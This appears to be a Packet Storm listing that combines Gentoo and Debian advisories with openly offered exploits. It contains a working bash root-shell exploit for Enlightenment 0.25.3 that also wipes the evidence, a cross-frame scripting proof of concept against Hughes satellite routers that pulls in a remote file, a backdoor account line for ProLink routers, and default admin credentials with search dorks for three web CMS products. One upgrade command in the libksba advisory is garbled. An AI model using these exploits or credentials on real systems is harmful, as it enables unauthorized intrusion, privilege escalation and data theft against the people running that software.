Gentoo Linux Security Advisory 202212-6 - Multiple vulnerabilities have been found in OpenSSH, the worst of which could result in arbitrary code execution. Versions less than 9.1_p1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202212-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: OpenSSH: Multiple Vulnerabilities  
     Date: December 28, 2022  
     Bugs: #874876, #733802, #815010  
       ID: 202212-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in OpenSSH, the worst of which  
could result in arbitrary code execution.

Background  
=========  
OpenSSH is a free application suite consisting of server and clients  
that replace tools like telnet, rlogin, rcp and ftp with more secure  
versions offering additional functionality.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-misc/openssh           < 9.1_p1                    >= 9.1_p1

Description  
==========  
Multiple vulnerabilities have been discovered in OpenSSH. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All OpenSSH users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/openssh-9.1_p1"

References  
=========  
[ 1 ] CVE-2020-15778  
      https://nvd.nist.gov/vuln/detail/CVE-2020-15778

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202212-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202212-06

Gentoo Linux Security Advisory 202212-7 - An integer overflow vulnerability has been found in libksba which could result in remote code execution. Versions less than 1.6.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202212-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libksba: Remote Code Execution  
     Date: December 28, 2022  
     Bugs: #877453  
       ID: 202212-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
An integer overflow vulnerability has been found in libksba which could  
result in remote code execution.

Background  
=========  
Libksba is a X.509 and CMS (PKCS#7) library.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-libs/libksba           < 1.6.3                      >= 1.6.3

Description  
==========  
An integer overflow in parsing ASN.1 objects could lead to a buffer  
overflow.

Impact  
=====  
Crafted ASN.1 objects could trigger an integer overflow and buffer  
overflow to result in remote code execution.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libksba users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/libksba-1.6.3"

References  
=========  
[ 1 ] CVE-2022-3515  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3515  
[ 2 ] CVE-2022-47629  
      https://nvd.nist.gov/vuln/detail/CVE-2022-47629

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202212-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202212-07

Hughes Satellite Router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application. Affected versions include HX200 8.3.1.14, HX90 6.11.0.5, HX50L 6.10.0.18, HN9460 8.2.0.48, and HN7000S 6.9.0.37.

    Hughes Satellite Router Remote File Inclusion Cross-Frame ScriptingVendor: Hughes Network Systems, LLCProduct web page: https://www.hughes.comAffected version: HX200 v8.3.1.14                  HX90 v6.11.0.5                  HX50L v6.10.0.18                  HN9460 v8.2.0.48                  HN7000S v6.9.0.37Summary: The HX200 is a high-performance satellite router designed toprovide carrier-grade IP services using dynamically assigned high-bandwidthsatellite IP connectivity. The HX200 satellite router provides flexibleQuality of Service (QoS) features that can be tailored to the networkapplications at each individual remote router, such as Adaptive ConstantBit Rate (CBR) bandwidth assignment to deliver high-quality, low jitterbandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,and DNS Server/Relay functionality, together with a high-performancesatellite modem, the HX200 is a full-featured IP Router with an integratedhigh-performance satellite router. The HX200 enables high- performanceIP connectivity for a variety of applications including cellular backhaul,MPLS extension services, virtual leased line, mobile services and otherhigh-bandwidth solutions.Desc: The router contains a cross-frame scripting via remote file inclusionvulnerability that may potentially be exploited by malicious users to compromisean affected system. This vulnerability may allow an unauthenticated malicioususer to misuse frames, include JS/HTML code and steal sensitive informationfrom legitimate users of the application.Tested on: WindWeb/1.0Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5743Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php23.12.2022--snippet:///XFSRFI//// Hughes Satellite Router RFI/XFS PoC Exploit// by lqwrm 2022////URL http://TARGET/fs/dynaform/speedtest.html//Reload target//window.location.reload()console.log("Loading Broadband Satellite Browsing Test");//Add cross-frame file include (http only)AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");console.log("Calling StartTest()");StartTest()//console.log("Calling DoTest()");//DoTest()//Unload weapon//document.getElementById("URLList").remove();

Hughes Satellite Router Remote File Inclusion Cross Frame Scripting

The ProLink PRS1841 home router suffers from having a backdoor account.

    # Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber# Exploit Author: Lawrence Amer @zux0x3a# Vendor Homepage: https://prolink2u.com/product/prs1841/# Firmware : PRS1841 U V2# reference: https://0xsp.com/security%20research%20%20development%20srd/backdoor-discovered-in-pldt-home-fiber-routers/Description========================A silent privileged backdoor account discovered on the Prolink PRS1841 routers; allows attackers to gain command execution privileges to the router OS.The vulnerable account issued by the vendor was identified as "adsl" and "realtek" as the default password; attackers could use this account to access the router remotely/internally using either Telnet or FTP protocol.PoC=============================adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/cli

ProLink PRS1841 Backdoor Account

Debian Linux Security Advisory 5306-1 - Several vulnerabilities were discovered in gerbv, a Gerber file viewer, which could result in the execution of arbitrary code, denial of service or information disclosure if a specially crafted file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5306-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 27, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gerbvCVE ID         : CVE-2021-40393 CVE-2021-40394 CVE-2021-40401 CVE-2021-40403Several vulnerabilities were discovered in gerbv, a Gerber file viewer,which could result in the execution of arbitrary code, denial of serviceor information disclosure if a specially crafted file is processed.For the stable distribution (bullseye), these problems have been fixed inversion 2.7.0-2+deb11u2.We recommend that you upgrade your gerbv packages.For the detailed security status of gerbv please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/gerbvFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOq/ExfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Qbzw/9HJCEspk5wEzreH6CJZb1NQdGHFg4WupQnTss3bOhJF9bw6RJegaGNZB+XhJ3b6924dwu5yI/WfFn7lcNSvNlZ2gRE/VqOeWtBTrwI0+xGbKX/dN/qve98sXDgsbQPFi16Vky/5IWMvu9zYAlHAeyjeS1uCVPartlEdQZOzMQ360GDvY/GJ9X8bKldQ1+LtV5qxph97sYuADttNdCY+Qeuu5bvsgXZiKHUX3Fa5v7855APS12w8kRbvaHe9mAhokQ3AXWyZguvBUIEDuHxRR2OeLH5wXQDe5/R/AHiUrkghxmWX2k1APhP7BS7gfVgNy7yhnZVPLmd85yKSOndiIy3v8rUg8KPmSN7lTKMJDLdlneNHa+vesKN9UgB431fvT6z6s3ZOOTIKE9X/G/m11m54QbC0TyXDkL0lFzCC+JHcKxrRK7PxPcJ5Wmyt7/tW3tYHGMNYF30IEqvETXONMh1H4Adg5M5leuXK3j1dotUBtGprAGAZKuc164zNzejkoRfhtOOU5244AU+qWrc803jWhHcPX/a3+STt/IVAykUIw1lxsskNpQx+JnzyBnU85KNZtyB99kkrbjPfhX5vImv4iBrN0hEmnnbQHM22YilTN1BMZJAbEKyD6jtSvyKwotRXD6TEpYIe7fMPz5rwxg1by4LpBlE3x3gvbjN6zFO8I=yc9S-----END PGP SIGNATURE-----

Debian Security Advisory 5306-1

Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc.

Scapy Packet Manipulation Tool 2.5.0

Enlightenment version 0.25.3 suffers from a local privilege escalation vulnerability.

    ## Title: Enlightenment Version: 0.25.3 LPE## Author: nu11secur1ty## Date: 12.26.2022## Vendor: https://www.enlightenment.org/## Software: https://www.enlightenment.org/download## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706## Description:The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.Enlightenment_sys in Enlightenment before 0.25.4 allows local users togain privileges because it is setuid root,and the system library function mishandles pathnames that begin with a/dev/.. substringIf the attacker has access locally to some machine on which themachine is installed Enlightenmenthe can use this vulnerability to do very dangerous stuff.## STATUS: CRITICAL Vulnerability## Tested on:```bashDISTRIB_ID=UbuntuDISTRIB_RELEASE=22.10DISTRIB_CODENAME=kineticDISTRIB_DESCRIPTION="Ubuntu 22.10"PRETTY_NAME="Ubuntu 22.10"NAME="Ubuntu"VERSION_ID="22.10"VERSION="22.10 (Kinetic Kudu)"VERSION_CODENAME=kineticID=ubuntuID_LIKE=debianHOME_URL="https://www.ubuntu.com/"SUPPORT_URL="https://help.ubuntu.com/"BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"UBUNTU_CODENAME=kineticLOGO=ubuntu-logo```[+] Exploit:```bash#!/usr/bin/bash# Idea by MaherAzzouz# Development by nu11secur1tyecho "CVE-2022-37706"echo "[*] Trying to find the vulnerable SUID file..."echo "[*] This may take few seconds..."# The actual problemfile=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)if [[ -z ${file} ]]then  echo "[-] Couldn't find the vulnerable SUID file..."  echo "[*] Enlightenment should be installed on your system."  exit 1fiecho "[+] Vulnerable SUID binary found!"echo "[+] Trying to pop a root shell!"mkdir -p /tmp/netmkdir -p "/dev/../tmp/;/tmp/exploit"echo "/bin/sh" > /tmp/exploitchmod a+x /tmp/exploitecho "[+] Welcome to the rabbit hole :)"${file} /bin/mount -onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),"/dev/../tmp/;/tmp/exploit" /tmp///netread -p "Press any key to clean the evedence..."echo -e "Please wait... "sleep 5rm -rf /tmp/exploitrm -rf /tmp/netecho -e "Done; Everything is clear ;)"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)## Proof and Exploit:[href](https://streamable.com/zflbgg)## Time spent`01:00:00`

Enlightenment 0.25.3 Privilege Escalation

Courier Deprixa version 2.5 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 Backdoor Account Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=09731 [+] https://deprixalogistics.online/dashboard/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Courier Deprixa 2.5 Backdoor Account

Consultine Consulting Business and Finance Website CMS version 1.8 has been reported as having a default backdoor account.

    =======================================================================================================================================================================================| # Title     : consultine consulting business and finance website cms v1.8 Backdoor Account Vulnerability                                                                            || # Author    : indoushka                                                                                                                                                             || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                                                                               | | # Vendor    : https://codecanyon.net/item/consultine-consulting-business-and-finance-website-cms/22236735                                                                           |  | # Dork      : About Us  Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex enim concludaturque. Senserit salutandi euripidis no per, modus maiestatis scribentur est an.|=======================================================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin@gmail.com & pass=1234 [+] https://www.seusite.top/jornal/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Consultine Consulting Business And Finance Website CMS 1.8 Backdoor Account

Car Dealer Pro version 2.01 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : Car Dealer Pro v2.01 Backdoor Account Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://codecanyon.net/item/car-dealer-pro/7265588                                                                 |  | # Dork      : "Powered by: Car Dealer Pro"                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=pass1234 [+] http://car.wenclub.vip/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Source

Packet Storm